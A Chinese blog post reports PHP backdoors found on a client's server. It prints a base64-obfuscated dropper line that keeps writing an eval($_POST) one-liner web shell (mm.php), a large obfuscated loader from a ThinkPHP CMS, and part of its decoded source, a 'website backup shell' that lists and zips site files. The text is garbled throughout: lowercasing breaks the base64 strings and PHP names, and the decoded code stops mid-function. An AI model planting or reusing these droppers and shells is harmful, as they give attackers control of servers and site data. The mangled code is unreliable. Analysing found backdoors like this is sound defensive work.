当前位置: 移动技术网 > IT编程>开发语言>PHP > PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode)

PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode)

2019年05月26日  | 移动技术网IT编程  | 我要评论
今天一个客户的服务器频繁被写入:
mm.php
内容为:
复制代码 代码如下:

<?eval($_post[c]);?>

最后查到某文件内的第一行为以下代码:
复制代码 代码如下:

fputs(fopen(base64_decode("bw0ucghw"),"w"),base64_decode("pd9ldmfskcrfue9tvftjxsk7pz4="));
base64_decode("bw0ucghw") //mm.php
base64_decode("pd9ldmfskcrfue9tvftjxsk7pz4=") //
<?eval($_post[c]);?>

这样,只要这些文件被访问就会自动创建 mm.php
如果你发现了mm.php,删除了,以后还会再有的,真是越来越变态了~
下以相关内容
复制代码 代码如下:

pd9ldmfs //base64_encode("<?eval");
zxzhba== //base64_encode("eval");

还发现一个thinkphp框架—sgcms的相密文件,内容以下:
复制代码 代码如下:

<?php // code by isosky www.nbst.org
$ooo0o0o00=__file__;$ooo000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');$oo00o0000=12308;$ooo0000o0=$ooo000000{4}.$ooo000000{9}.$ooo000000{3}.$ooo000000{5};$ooo0000o0.=$ooo000000{2}.$ooo000000{10}.$ooo000000{13}.$ooo000000{16};$ooo0000o0.=$ooo0000o0{3}.$ooo000000{11}.$ooo000000{12}.$ooo0000o0{7}.$ooo000000{5};$o0o0000o0='ooo0000o0';eval(($$o0o0000o0('je9pme9pmdawmd0kt09pmdawmdaweze3fs4kt09pmdawmdawezeyfs4kt09pmdawmdaweze4fs4kt09pmdawmdawezv9lirpt08wmdawmdb7mtl9o2lmkcewksrpmdawtzbpmda9je9pme9pmdawmcgkt09pme8wtzawlcdyyicpoyrptzbptzawme89je9ptzawmdawmhsxn30uje9ptzawmdawmhsymh0uje9ptzawmdawmhs1fs4kt09pmdawmdawezl9lirpt08wmdawmdb7mtz9oyrptzbptzawtza9je9ptzawmdawmhsxnh0uje9ptzawmdawmhswfs4kt09pmdawmdaweziwfs4kt09pmdawmdawezb9lirpt08wmdawmdb7mjb9oyrptzbptzawme8oje8wmdbpme8wmcwxmty1ktskt08wme8wme8wpsgkt09pmdawme8wkcrptzbptzawtzaoje9pme9pmdawtygktzawme8wtzawldm4mcksj05twgzzt0cvuxexewf1ak00vzlfedh0bek3b0fivmr3nwheq3oyqjbuc3zqcfpts2diujnkvuxlaytynmnuauy9jywnqujdrevgr0hjsktmtu5puffsu1rvvldywvphymnkzwznaglqa2xtbm9wcxjzdhv2d3h5ejaxmjm0nty3odkrlycpksk7zxzhbcgkt08wme8wme8wkts=')));return;?>
qytmafsmafsmafu3v/qwhb8gagoc7950lutg9xboluc0yxq0qdkzejtmaycge3ngydq0qdgnqytme3ngafsmax5zejcgejcgaycg1xwme3sme3ngaycnqycgafsmaycgaxgzejcgaycgafng19g0e2ui722mwrtwheo+il8veewljx8kj/wp9evk4xht7/huoywfdcqxag+3v2sgtbuy7lq9ajs8eg8p1eqliuwswcj0yxvs4zuywx7/9y219jbuezt4x8qe8o8t8uh7tbodilw27bvnotspagumaesbh0ujvl7ed/2rafyra34uuchkj9pkqrzs19z67bupaeu21xwmafnge3smafnsjl8litgnqytmafsmafsmaxz67tunarn0mghjatgif4ncog8h7fk5f4ncat8ji9snv/wgyt8bvt2lm9qfal+j7t+jy8w+hgxdqguka0w2a04tq0w2d/4ko/wzafp5ilhhh0u2vfu0icq3aeqdmdn5f4ncvg2jagxi9gop78w2itj58l8dhl2j79sxitupvln58cymaxsx7lwhqxj5q3z2ilhkqgv2vg8mvd509owxxotqeuuxqrz6jl8cogc5q3gkvg2jagxif4nchew+agx5v/2g7ejdvg8kvxtcheadm5j1ibtzd9bzolip7ggp7/4p7g4pvtgpalgpagzpofypofqpofapof4pofxpofiph/q2yguk7gxp7btra9bbot8p7/u2vxbp7tv2ab4pot+gvl4pvg8kvgor7typhxbdagtcoeouaew2y/wny/wzdgj1ator7l2mjcn6hgoz7g2m73ngjgj1w4j1f4sdalw+q/puxbqhilz0hbtuab4rqj8xwxqowfpuxbukagtrjda3a3a6f4sbal+jyt7hat2pdend4lqsitgdyyusieqkhltbvxs7ixh2o9bt7lqzit+hyyh2a/72vg2ci9bshb2haxbeit+3y8u2hb2bjgj17btmvxu3ols2jcyjh/56f4stf4nmvg8kvg7s7tbzy/w2d/whhb8hq/puxbqkhbw2hcnbh/55hltpot457eq27tk6f4sbal+jylusdbxraewgdfpux0sh7gwsabhra0skjgj1w4j1f4nmvg8kvg7s7tbzjb7kie83y/w2d/whhb8hjb7kie83q/puxbqkhbw2hducalbkhcncwcof4evojgj1w4j1ybquv/wkads6f4sbal+jylusdbxraewgdfpux0w2d/4z7g8caeqhvg2kacsmal+2jgj1ator7l2mylwkhfnuh/56f4sditup7eqkvt+zjduguxiuwcx6f4sdaeqz7lqralskq/ukag2zqgvr7t8mjgj1iltpaeqrq3ngafpux0sh7gwsabhra0skqf8gdfpux0jux5j1ybquv/wkacsnae72hds6f4sj7lhjytw2iltrilwsalkrabtm7epuxbqhilz0hbtuab4rqj8owepuxbqkhbw2hcnbh/55hltpot45qjib4jyewepuxbukagtrjdagafn6f4stf4nux0sr79s6f4sdaeqz7lqralskqxucila5hltpot46f4spot+2yth2otvnvfnbj/skjgj1ae72hb7paehril8ja3pux0vkhb4zveqhhfsdhb8horueaeqzjgj1atokyth2otvnvfnracsgdfpuxbuhhbvsacnjh/56f4sgitwzot+0jcwgdxnkh/56f4stf4nuxcgkhew+agxif4ncylh2it4iqnj1mg7khbj5itujottmm9qdqgu2vghk7fjdhgt3vxq5aboz7ejdhgt3vg7khbjdm5j1qxn5qnj1qxnc7g2lqgopotvmm9qp7t7jqdscago3h3jdhl8hhbunibtkqckuxdn5qxn0jgj1ot+sleu2vx50at8zaeq+llbsat2jqrg0acnjjyj01epuxb8cogc5qcbghbxiqxn5qxn5qxn5qxn5qxn5qxn5qxn5qxn5qxn5qxn5qxn5qxn5qxnzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jzf4nqqxn5qxn5qxn5qxn5qxn5qxn5qxn5qxn5qxn5qxn5t3bbal+jqgukagtrm9agayqxafni1cgk7btmvf+v9gop78w2itj5xyh4qov2i0usvgx54bocoe8gqoun7tbpqoibycn54b8ji4j1x4zqqxn5qxn5qxn5qxn5qopc7btmvxscalbkhcjcafsx4cngmdncyl7ka04ilx7kh08zjbhjv/nryrtevehmogop79+cigj1x4zqqxn5qxn5qxn5qxn5qopc7btmvxscalbkhcjcafsx4cngmdncyl7ka04ilt23aeupd9v3qyqpalhrveveyb+dhe4maeq0f4n5qxn5qxn5qxn5qxn5qxn5qxn5qxn5qxn5qxn5qxn5qxn5qxn5qxjzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jqx4zqqxn5qxn5qxn5qxn5qxn5qxn5qxn5qxnuxz7sagx5eg23vfncyesr7ekdjgj1qg7zolq5m9skhg8m7g2r1xhmyrhsjgj1vlhsagxnqg7sagxthb8h7gwshd5z7bwshdzsf4s6f4ss7d5z7b2p7ejtqrk0w/gz7b2p7ejtqrkmqrz5f4scal+jot+u7epuxb8cogc5qcbsa0suvxsmitu2m9vz7b2p78zvqrsjdls2m9vcog8colqkdxh5vbopvtxtqrwbotb2qrndyd5z7b2p7ejtibo37t+hatxnlutg9xbolucsmrh0jdvcog8col8zqrzmq3k5q3puxb2b1g23ll7sagxnqg7sagxs14j1dgj17tunarndmg7ka0457boc7euhq0vsabvzot+0hugdq/usdbxtlxqulxqiacgk7btmvfkbabq3hfpbabq3hfpz7b2p7ebdhckdjgj1w4j17tb374j1dgj17tunarndmg7ka0457boc7euhq0vsabvzot+0hugdq/usdbxtlxqulxqiafgk7btmvfkbabq3hfpz7b2p7ebdhckdjgj1w4j1w4j1jl8cogc5qrn5f4n5qxn5f4n5qxn5wb2p78w+hgxrf4n5qxn5mg2mh/8jqg+hatxtqb7sag8jdls2qdsjdls2m9qj7lhjqdss7fjd7b2p7lw+hgxdqgupilu3m9qj7lhj7b22ag4dq/7ha/82m9qdq/usdbxtqcxgqckuxdn5qxnn4bbhabp57btrqgopaxbuhlx5q0gdq/wkq/u2hgorilw2ygxm7rkrhghgwghjatbco0s019nci0q5y3kuxdn5qxsxitupvln5wg2r7tujaeq+jdn5f4n5qxn5mg2mh/8jqg+hatxtq0wk7g2rqdsjdls2m9qj7lhjqdss7fjdvgtzolqdqgupilu3m9qj7lhj7b22ag4dq/7ha/82m9qshltwibocoe8gqds3ols2m9qja9qiqxnuxdn5qxnn4bbhabp57btrq/wnola57g2r7tujaeq+y/8379sr7tbhvg2l79suhbgpit+zq/2kv9szvlujqgq2qgodagx5vgc5veqsvgx57b2p79z5qnj1qxn5qfbdhck5qnj1qxn5qyqhilzuhxsjitu2jdn5f4n5qxn5mg2mh/8jqg+hatxtq0sshg+hatxdq/w+hgxtq0w2d/4dqg2zm9qrolsmitu2qdscago3h3jdvg8kvg7s7tbzqdslitbu7ejdoluky0sshxq5hl2r7ejduf4dmdn5f4n5qxn51x+roln5v/2g79sbotb219n5f4n5qxn5mgqrmdn5f4n5qxn5mgqrm5j1qxn5qfbsa0suvxsmitu2m9qditupvlndq/w+hgxtqbhs7gw2adq5ot4tqbqhilzuhxq5vbopvtxtqbwkdb2gqck5qxn5f4n5qxn5mg2mh/8jq/w+hgxtq0uuibusvxq5aboz7ejdxe8dat2jqdscago3h3jdi08jvgtmqdslitbu7ejdag8jlxv3qgvkq9qiqnj1qxn5qxn5mgwsvdshag20acjdil8mvg8rqckuxdn5qxnci9snhb8bm9qnv/wgjdckabq3vx+khbhdmcbsath5heqcm9qnv/wgjdckabq3vx+khbhkagt0ar+gabhdqgqkhbw2hcjdaxqimxthmcgk7g2lm5j1qxn5qfbzoliif4n5qxn5qxn5qxh6f4s37lwwvg2z78tpotusvx5g1epuxbupilu3qosqx/sshnj1dgj1vborqxwbotb2llukvt+jqfj5axn6f4slilq5qgwhvgo3v/qwag8mqxn5m9ngjgj1vborqxwzolq3v/qwag8mqfj5afpux07hhdnz7b2p7twhvgy5m9n0q3pux07hhdnz7esbotb2aboz7epux07hhdnz70n6f4slilq5qgwsh0ujhcj0q3pux07hhdnz7b2p7t7sa/w2h0a5m9shh0qhd95sjgj1708miewsalk5xl8jwb2p7x7sa/w2hd5z7b2p7lw+hgxsf4s6f4nzvghshrji7b2p7t7sa/w2h0a5m9s2d/spalw21xvcqrgz7b2p7lw+hgxsjgj1w4j1708miewsalk5vt+sdfqyaeuxotu21xwuab2kvg2z79ntqfnsqnj1dgj1q/wsat8hh0qhd9ntqx5zvt+sd/wsatx5mej5axz5mlv2vgwhvgxn19nrqgv2vgwhvgxnq/8molhjotu21epuxb2bqx5zvg2z7torhbo+trv+7torquj5mfy+jfnsqnj1dgj1q/wsat8hh0qhd8p0dt8hhdvvqxn5qfj5aezkafpuxdwjotu2ilqril2aqlukadvvqxn5qxntqfy6f4nzvg2z7torhbo+trvz7go+quj5qxn5m9nbjgj1q/wsat8hh0qhd8p0ogtuh0a0l9n5qfj5afpuxdwjotu2ilqril2aqlusa08j7la0l9ntqfn6f4nzvg2z7torhbo+trv37tukabw3quj5m9ngjgj1w4j1hb8jvlqmqx5nq/wsat8hh0qhd8p0dt8hhdvvqxjbje5g19ncmfqu19sc1xwjotu2ilqril2aqlukadvvqfgcacysq/gnq/wsat8hh0qhd8p0atwhd9vvqfgcaeisq/gnq/wsat8hh0qhd8p0ogtuh0a0l9ncmfyb19sc1xwjotu2ilqril2aqlusa08j7la0l9ncmfxsq/gnq/wsat8hh0qhd8p0hl8cal+zhrvvqfkia9z6f4stf4sbvt+cvg2kads3vgorvg7sagxnq/shvg55m9n07gtzar+roln014j1dgj1q/wnolazmbvr7b2p7t+hatxtq/shvg56f4nzal2gilwn7g2rmtorhbo+1xz6f4szagj1dgj1qgu+hgojogwsh2zvqfj5q/shvg55m9szolqmitu21xwgilwn1epux0ueog2p795zhgojoxnhm9n0ydhsjgj14g8m7x5zal2gilwn7g2r1epuxbwkf4s6f4nzhgojoxntqyscvlqr7t+j1xwzdlshvghzolqsjgj14gup7g2r1xwgilwn1epux0ueog2p79hnh/q2vd5zal2gilwn7g2r19z6f4ss7d5zvghshrji70nt4g7khg8m1xwjog23ye+0db7sag8mitu2yxveqrzsf4s6f4sr7lwuhbk5v/qu7epux0jux0q2v/8radsbitb37epux0juxb7uabujottmqgoz7g7sagxnqgwhvgypqg+hatxsf4s6f4nzaboz79ntq/ujh2tr7lspitu21xvhlxhpqrc0yxwmitu21epuxb2b1/ujh0qco/qnqg+hatxpqrc01ejtqrc019nux0q2v/8radnzvghshrjiitwz7g2r1xwmitu21epuxb2b1xo2alsjd95zvghshrji7b2p7t7sa/w2h0as14j1dgj1oti51xosa2thh0qhd9h2ab4n7lhgagtz7950ydhpqg+hatxs19gzvghshrji7b2p7t7sa/w2h0as14j1dgj1hb8jvlqmjgj1w4j1w4j1qgwjotu2qfj57g8cog8k1xwjog23ye+uab2kazwkhuwsatxn19z6f4nzog8k7/wsatx5m9n0l/50ydwzvg2z78pll9nmqgwjotu2t3vvqxk0l/50ydwzvg2z78pjl9nmqgwjotu2t38vqxk0l/50ydwzvg2z78prl9nmqgwjotu2t3uvqxk0l/50ydwzvg2z78pgl9nmqgwjotu2t3ovjgj17l7hax50qgh2dgwjotu2qfj5qdhmqgh2dgwjotu2qxk0qcp01epuxdwuabuwag8mqfj5hewrag8m1xwzilwh1epuxdwchbaqqfj5ieqca3qnqgwhvgysjgj1q/szilwhqxn5m9s0dbukalsr7lu31xwzilwh1epuxdwcllb2adn5qfj5hewrag8m1xwr7goji9z6f4nzdbwhvgy5qxntq/uui0ujhdh3vtq3v/qnq/szilwhyfnphewrag8m1xwr7goji9z5ye4syfqsjgj1qgwhvgo3v/q5qfj5q2bkueshdfwdl/5gaubkaf4djgj1qgwhvgo3v/q5ycj5q2bkaewhdfngqcpuxdwzilwhhewrqxktqxqhdfngl/5gaxq6f4nz7gojilujhdnmm9ndl/5gjobkafndjgj1qgwhvgo3v/q5ycj5qgh2dgwjotu2jgj1qgwhvgo3v/q5ycj5hgocor508dhpqgurirz6f4nz7gojilujhdnmm9sgitup1xvtqrgziutp7tksjgj1qgwhvgo3v/q5ycj5hgocor508dhpq/8miutp7tksjgj1qgwhvgo3v/q5ycj5hgocor50vdhphewrag8m1xwmitu219z6f4nz7gojilujhdnmm9sgitup1xvlqrgg1epuxdwzilwhhewrqxktqxwmitu2jgj1qgwhvgo3v/q5ycj5q/szilwhjgj1qgwhvgo3v/q5ycj5hgocor508dhpqgurirz6f4nz7gojilujhdnmm9sgitup1xvtqrgziutp7tksjgj1qgwhvgo3v/q5ycj5hgocor508dhpq/8miutp7tksjgj170vrolw21xwjog23ye+bhxgz7gojilujhdz6f4nzal2w7gojilujh2tp7tk5m9s3v/qp7tknqgwhvgo3v/qsjgj1vt+37l4nqgwhvgo3v/qsjgj1qgwsh0ujhdn5m9ndl/5uaobkugqhdfnbl/5gadq6f4nz7g2rhewrqxktqxqhdfngl/5gaxq6f4nz7g2rhewrqxktqxqhdfyjl/5gaxq6f4nz7g2rhewrqxktqxqhdfngl/5gaxq6f4nz7g2rhewrqxktqxqhdfnkl/5gaxq6f4nz7g2rhewrqxktqxwn7lhzvg2z7epuxdwzolq3v/q5ycj5hgocor508dhpqgurirz6f4nz7g2rhewrqxktq/shilpnqui0yxwcllb2adz6f4nz7g2rhewrqxktq/shilpnqui0yxwuabuwag8m1epuxdwzolq3v/q5ycj5hgocor50vdhphewrag8m1xwmitu219nsjgj1qgwsh0ujhdnmm9sgitup1xvlqrggqxz6f4nz7g2rhewrqxktq/shilpnqei0yfn51epuxdwzolq3v/q5ycj5hgocor50vdhpaxnsjgj1qgwsh0ujhdnmm9sgitup1xvlqrggqxz6f4nz7g2rhewrqxktq/shilpnqui0yfarqxz6f4nz7g2rhewrqxktq/shilpnqui0yxwjog23ye+zilwhhewrllb2adnsjgj1qgwsh0ujhdnmm9nzaboz7epuxdwjog23ye+zolq3v/q5ycj5qgwsh0ujhcpuxdwjog23qxji7b2p78tcae8mvxnp13puxdwjog23qxji7g2rhewrllb2adnpm9s3v/qp7tknqgwsh0ujhdz6f4nzvghshrnzmbwhvgo3v/qwag8mqxptqxwzd8tzilwhhewrllb2acpux0juxb7uabujottmqgoz7gwshd5zaboz79zux0puxdwmitu2qfj5hewrleq2hgbhilxnq2bhqdg0yrhpqg+hatxsjgj1qgwhvgo3v/q5m9ndl/5uaobkugqhdfn3l/5guobkagohdfngl/5gaobkafshdfngl/5gaobkafshdfngl/5gaobkafndjgj1qgwhvgo3v/q5ycj5hgocor508dhpaxzmhgocor508dhpaxzmhgocor508dhpaxzmhgocor50vdhphewrag8m1xwmitu219nsjgj1qgwhvgo3v/q5ycj5hgocor50vdhpaxnsydwmitu2y0shilpnqui0yfnsy0shilpnqui0yfnsy0shilpnqui0yfnsjgj170vrolw21xwjog23ye+bhxgz7gojilujhdz6f4nzal2w7gojilujh2tp7tk5m9s3v/qp7tknqgwhvgo3v/qsjgj1vt+37l4nqgwhvgo3v/qsjgj1qgwsh0ujhdntqxqhdfxgl/5ji2bkafohdfnrl/5gaobkafshdfshl/5gaobkafshdfngl/5gaobkafshdfngl/5gaobkafshdfngqcpuxdwzolq3v/q5ycj5hgocor508dhpaxzmhgocor508dhpaxzmhgocor508dhpaxzmhgocor50vdhphewrag8m1xwmitu219nsjgj1qgwsh0ujhdnmm9sgitup1xvlqrggqxzmhgocor50vdhpaxnsy0shilpnqei0yfn519+gitup1xvlqrggqxz6f4nz7g2rhewrqxktq/shilpnqui0yfylqxzmhgocor508dhpq/wnolazmbwhvgo3v/qwag8m19kzaboz7epuxdwjog23ye+zolq3v/q5ycj5qgwsh0ujhcpuxdwjog23qxji7b2p78tcae8mvxnp13puxdwjog23qxji7g2rhewrllb2adnpm9s3v/qp7tknqgwsh0ujhdz6f4nzvghshrnzmbwhvgo3v/qwag8mqxptqxwzd8tzilwhhewrllb2acpux0juxb7uabujottmqgur7toj7t7sagxn14j1dgj1qg8m7/ujhdntqxqhdfxgl/5ji2bkaf8hdfnll/5gaobkafshdfngl/5gaxqmf4sgitup1xvlqrgzvghshrnzmb7sag8wiltua04sqxkux0shilpnqei0yxwjog23qxji7b2p78tcae8mvxz5y5j1hgocor508dhpq/wnola5ye+zolq3v/qwag8m19nmf4sgitup1xvtqrgzvghshrnzmbwhvgo3v/qwag8m19nmf4ndl/5gaobkafndjgj170vrolw21xwjog23ye+bhxgzvghshrji7g2rhewrydw2abw3v/qsjgj17bupaeu21xwjog23ye+bhxz6f4stf4stf4ss7d5hv/qsa95zluqox88oxuwadb2gaboz78js19nuxdwwxz8w8x8e8ozrolsmitu2l9ntqxvzalwkdb2gy0sshxh6f4s2a/u2qnj1qot9w8o8w8uxtesshg+hat8vqfj5v/qsa95zluqox88oxuwadb2gaboz78jsjgj1otinqlujh0qco/qnhewrvgtpaev2hd5zluqox88oxuwadb2gaboz78jsyxhmqrztm9hmdb2gqrz5f4nzluqox88oxuwadb2gaboz78j5ycj5qr+roln0jgj1qot9w8o8w8uxtewk7g2rl9ntq/ujh2tr7lspitu21xvhlxhpqrc0y/wrotjnqot9w8o8w8uxtewk7g2rl9zsjgj1otinqlujh0qco/qnhewrvgtpaev2hd5zluqox88oxuwavgtzolqv19g0yrhsmej0yrhsqnj1qot9w8o8w8uxtewk7g2rl9nmm9n0yrh6f4ss7d5zluqox88oxuwavgtzolqvmej0yrhsqnj1qot9w8o8w8uxtewk7g2rl9ntqxhmyrh6f4sbvt+cvg2kadspoluj7b2p7lanqgwshcj0ydhsf4s6f4s0agtditg5qgwk7gtroln6f4nzhe8dll7sag8wa08zqfj5afpuxb2b1g23ll7sagxnqdwzolqd19zux0puxb2b1/q2itbgilwn1xwzalwkdb2gqxji7esbotb2aboz79zhmlq2itbgilwn1xqz7g2rqdzsf4s6f4nz7gtzaesshxnzmboz7g7sagxnotugagtz7950qrbbotb21xqz7g2rqdzsyxqz7g2rqdz6f4sr7lwuhbk5aepux0jux0q2v/8radngjgj1w4j1qghhabwp7eukhg8m7g2r1xqz7g2rqdz6f4seog2p79nnqg7sagx5m9sr7toz7g2r1xwnit+zagxs19nux0puxb2b1xwbotb2mej0ydvcwxwbotb2mej0ydk014j1iltmvg2mvtx6f4ss7dhshutzolqnqdwzolqkqg7sagxd19zux0puxdw3vtqw7b2p78tmvtj513j5ag23vg7sag831xqz7g2ryrwbotb2qdz6f4stf4s2a/u2qnj1dgj1otinhb8ha/shvg5nqgwk7gtroln5ye+0db7sag8mitu219ythb8ha/shvg5nqdwzolqkqg7sagxd19zux0puxdwzalwkdb2gqxjiitwz7b2p79hsalspalw21xh0yg7sagxnqdwzolqkqg7sagxd19zpqdwzolqkqg7sagxd1epuxdw3vtqw7b2p78tmvtj51rp6f4stf4stf4stf4scagt37twshd5zogom7gb21epuxb2b1xyzhe8dll7sag8wa08z19nuxdwzalwkdb2gqxjiitwz7b2p7950qrgdqgwshdcd1epux0q2v/8radnzhe8dll7sag8wa08zjgj1w4j1708miewsalk5a08zllqsv/8mol4nqg+ua9zux0puxdwdolwuab2jmtorhbo+1xh54dhpqrsy4dhpqrsu4dhpqrs/4dhsjgj17btr1xwp7lztafpzol8+mgukvt+j1xwdolwuab2j1epzol8+1rpsf4s6f4ss7d5za08zmcugaehnadgbaxnzol8+19jb14j1dgj1qg+ua8tdolwuab2jleujhcjnil8sax5za08zyeskvr5ryfyg1dwp7lzs1cygaxzkaeng19kdqxwdolwuab2jtrwp7l2vqcpux0jux0jux0q2v/8radnza08zllqsv/8molwwhewrjgj1w4j1otinoluwilqrilznqot9w8o8w8uxtlwbotb2l9zsf4s6f4nz7gtzaesshxntqg+2vrs49osroln6f4ss7d5zluqox88oxuwaql7sag8jdls2quj5qej5e28aexzuxdwzalwkdb2gqxjixl8jwb2p7x7sa/w2hd5zluqox88oxuwaql7sag8jdls2qujsjgj1otinqgwk7gtroln5ye+3vgorvg7sagxnqdwwxz8w8x8e8ozjalwsh2jzluqox88oxuwadb2gaboz78jd19zux0puxb8cogc5quvkhbzsabhpxgb2ilu2q/vhol4mydkci0qimgqrmdh6f4nz7b2p7t+ua9ntqfn6f4sbaeq2itun1xwwxz8w8x8e8ozz7b2p78j5ila5qg7sagxsf4s6f4ss7dhshutbotb21xwbotb219zux0puxb2b1xo2alsjd95z7gtzaesshxnzmb7sag8botbj7lq319zuxb2bqx5hot+wilqrilzn7t+z1g8khgbk7gxnqrk0yxwbotb219zpqgwk7gtroln5ye+botb27b2pvg8rhrzsf4scal+jot+u7epuxb8cogc5qcbbal+jqg7hilxtlxqeot+07g2m7euhqds3ols2m8gdu8gdmcqcyl7ka04iqb+dhen6qb+dhen6qg7sagxci0qiqcpux0juxb8phlxux0puxb8cogc5qcbbal+jqg7hilxtlxqeot+07g2m7euhqds3ols2m8gdu8gdmcncyl7ka04iqb+dhen6qg7sagxci0qiqcpux0juxdwbotb2a08zqxptqgbshewbotb2hr5z7b2p79z6f4stf4nz7gtzaesshxnzmbur7toj7t7sagxn1epuxb8cogc5qcbdhc+3vtuc7lu3yy7khdnz7b2p7t+ua9sbotb2hr+8hbgrmgy5o/q27cj0qot9w8o8w8uxtewk7g2rl9wwxz8w8x8e8ozrolsmitu2l9h5ll7coeuhvb8zvlqpm9hzluqox88oxuwavgtzolqvqot9w8o8w8uxtesshg+hat8vq3kzluqox88oxuwavgtzolqvqot9w8o8w8uxtesshg+hat8vqx5dyb+ua8tdolwuab2j1g7sag83ols21xqzluqox88oxuwavgtzolqvqot9w8o8w8uxtesshg+hat8vqdzsydhsmxthmdh6f4stf4s2a/u2f4s6f4s2ilhkqxqzluqox88oxuwavgtzolqvqot9w8o8w8uxtesshg+hat8vqy8rhbtryo8mitqp79sjarsehb2j79sbotb2ycbdhckdjgj1w4j1w4j1jl8cogc5qrn5f4ncyl7khbjiqxnuxcgkibtzdek5qnj1mxtnvgupmdn5f4n0jg==

解密后为:
复制代码 代码如下:

<?php
echo '<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=gb2312">
<title>haketeam website backup v1.0 beta - ';echo getenv('http_host');;echo '</title>
<style type="text/css">
body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,code,form,fieldset,legend,input,textarea,p,blockquote,th,td{
margin:0;padding:0;
}
body {
background:#ebebed;
color:#333;
font-family:"arial",microsoft yahei,verdana,helvetica,arial,sans-serif;
font-size:14px;
}
.textfield,textarea {
border:1px solid green;
font-size:14px;
padding:2px;
}
.textfield:focus,textarea:focus {
border-color:#f1ca7e;
}
.button {
font-size:14px;
text-decoration:none;
margin-top:5px;
background:#f5f5f5;
border:1px solid green;
color:#000;
padding:2px 5px;
}
.button:hover {
text-decoration:none;
background:#eee;
border:1px solid #f1ca7e;
color:#000;
}
pre {
border:1px #ccc solid;
line-height:18px;
overflow:auto;
word-wrap:break-word;
max-height:220px;
margin:4px;
padding:4px 8px;
}
</style>
</head>
<form action="" method="post" name="postform">
<div align="left" class="searchbox">
';
ini_set('memory_limit','2048m');
echo "<pre> ----------------------------------------------
[<font color=#00bb00>*</font>]haketeam php website backup shell v1.0 beta
[<font color=#00bb00>*</font>]forum:http://www.hake.cc
[<font color=#00bb00>*</font>]isosky's blog:www.nbst.org
----------------------------------------------
file list:</pre>";
$fdir = opendir('./');
while($file=readdir($fdir))
{
if($file=='.'||$file=='..')
continue;
echo "<input name='dfile[]' type='checkbox' value='$file' ".($file==basename(__file__)?'':'checked').'> ';
if(is_file($file))
{
echo "<font face=\"wingdings\" size=\"5\">2</font>  $file<br>";
}
else
{
echo "<font face=\"wingdings\" size=\"5\">0</font> $file<br>";
}
}
;echo '
filetype:
<input name="filetype" type="text" id="filetype" class="textfield" value="" size="50">
(blank for all,use "|" to separate,e.g.:php|html|jpg) <br />
backup directory:
<input name="todir" type="text" id="todir" class="textfield" value="iso_backup" size="41">
(blank for this directory,use relative url,and you must be able to write file)
<br>
backup name:
<input name="zipname" type="text" id="zipname" class="textfield" value="iso.zip" size="44">
(.zip type file)
<br>
<br>
<input name="backup" type="hidden" id="backup" value="dozip">
<input type="submit" name="submit" class="button" value="let\'s go!">
<div align="center">
<a href="http://nbst.org"><img src="http://nbst.org/logo.png" border="0"></a></div>
<div>
';
set_time_limit(0);
class phpzip
{
var $file_count = 0 ;
var $datastr_len = 0;
var $dirstr_len = 0;
var $filedata = '';
var $gzfilename;
var $fp;
var $dirstr='';
var $filefilters = array();
function setfilefilter($filetype)
{
$this->filefilters = explode('|',$filetype);
}
function unix2dostime($unixtime = 0)
{
$timearray = ($unixtime == 0) ?getdate() : getdate($unixtime);
if ($timearray['year'] <1980)
{
$timearray['year'] = 1980;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
}
return (($timearray['year'] -1980) <<25) |($timearray['mon'] <<21) |($timearray['mday'] <<16) |($timearray['hours'] <<11) |($timearray['minutes'] <<5) |($timearray['seconds'] >>1);
}
function startfile($path = 'dodo.zip')
{
$this->gzfilename=$path;
$mypathdir=array();
do
{
$mypathdir[] = $path = dirname($path);
}while($path != '.');
@end($mypathdir);
do
{
$path = @current($mypathdir);
@mkdir($path);
}while(@prev($mypathdir));
if($this->fp=@fopen($this->gzfilename,'w'))
{
return true;
}
return false;
}
function addfile($data,$name)
{
$name = str_replace('\\','/',$name);
if(strrchr($name,'/')=='/')
return $this->adddir($name);
if(!empty($this->filefilters))
{
if (!in_array(end(explode('.',$name)),$this->filefilters))
{
return;
}
}
$dtime = dechex($this->unix2dostime());
$hexdtime = '\x'.$dtime[6] .$dtime[7] .'\x'.$dtime[4] .$dtime[5] .'\x'.$dtime[2] .$dtime[3] .'\x'.$dtime[0] .$dtime[1];
eval('$hexdtime = "'.$hexdtime .'";');
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$c_len = strlen($zdata);
$zdata = substr(substr($zdata,0,strlen($zdata) -4),2);
$datastr = "\x50\x4b\x03\x04";
$datastr .= "\x14\x00";
$datastr .= "\x00\x00";
$datastr .= "\x08\x00";
$datastr .= $hexdtime;
$datastr .= pack('v',$crc);
$datastr .= pack('v',$c_len);
$datastr .= pack('v',$unc_len);
$datastr .= pack('v',strlen($name));
$datastr .= pack('v',0);
$datastr .= $name;
$datastr .= $zdata;
$datastr .= pack('v',$crc);
$datastr .= pack('v',$c_len);
$datastr .= pack('v',$unc_len);
fwrite($this->fp,$datastr);
$my_datastr_len = strlen($datastr);
unset($datastr);
$dirstr = "\x50\x4b\x01\x02";
$dirstr .= "\x00\x00";
$dirstr .= "\x14\x00";
$dirstr .= "\x00\x00";
$dirstr .= "\x08\x00";
$dirstr .= $hexdtime;
$dirstr .= pack('v',$crc);
$dirstr .= pack('v',$c_len);
$dirstr .= pack('v',$unc_len);
$dirstr .= pack('v',strlen($name) );
$dirstr .= pack('v',0 );
$dirstr .= pack('v',0 );
$dirstr .= pack('v',0 );
$dirstr .= pack('v',0 );
$dirstr .= pack('v',32 );
$dirstr .= pack('v',$this->datastr_len );
$dirstr .= $name;
$this->dirstr .= $dirstr;
$this ->file_count ++;
$this ->dirstr_len += strlen($dirstr);
$this ->datastr_len += $my_datastr_len;
}
function adddir($name)
{
$name = str_replace("\\",'/',$name);
$datastr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
